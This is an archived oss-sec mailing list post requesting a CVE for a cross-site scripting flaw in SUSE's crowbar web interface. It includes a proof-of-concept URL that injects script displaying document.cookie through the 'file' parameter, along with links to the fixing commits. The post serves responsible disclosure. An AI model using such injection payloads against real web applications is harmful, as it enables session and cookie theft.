oss-sec mailing list archives

CVE request: crowbar XSS

From: Thomas Biege <thomas () suse de>
Date: Thu, 30 Aug 2012 14:15:19 +0200


Hi,
Matthias Weckbecker of SUSE Linux Products GmbH has found the following
issue in crowbar:

http://crowbar.test.de:3000/utils?waiting=true&file=foo'%3B})%
3B}alert(document.cookie)</script><!--

https://github.com/SUSE-Cloud/barclamp-crowbar/commit/90e905b7668a1cc884fb70040f96c7a0a287de48
https://github.com/SUSE-Cloud/barclamp-crowbar/commit/a82ed926c6e3ba2b0cada213c35e4b00f34ea629

Cheers,
Thomas


-- 
Thomas Biege, Project Manager Security, CSSLP
SUSE LINUX GmbH, GF: Jeff Hawn, Jennifer Guild, Felix Imendörffer, HRB
21284 (AG Nürnberg)
--
  Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
                            -- Marie von Ebner-Eschenbach

Attachment: signature.asc
Description: This is a digitally signed message part

Current thread:

CVE request: crowbar XSS Thomas Biege (Aug 30)
- Re: CVE request: crowbar XSS Kurt Seifried (Aug 30)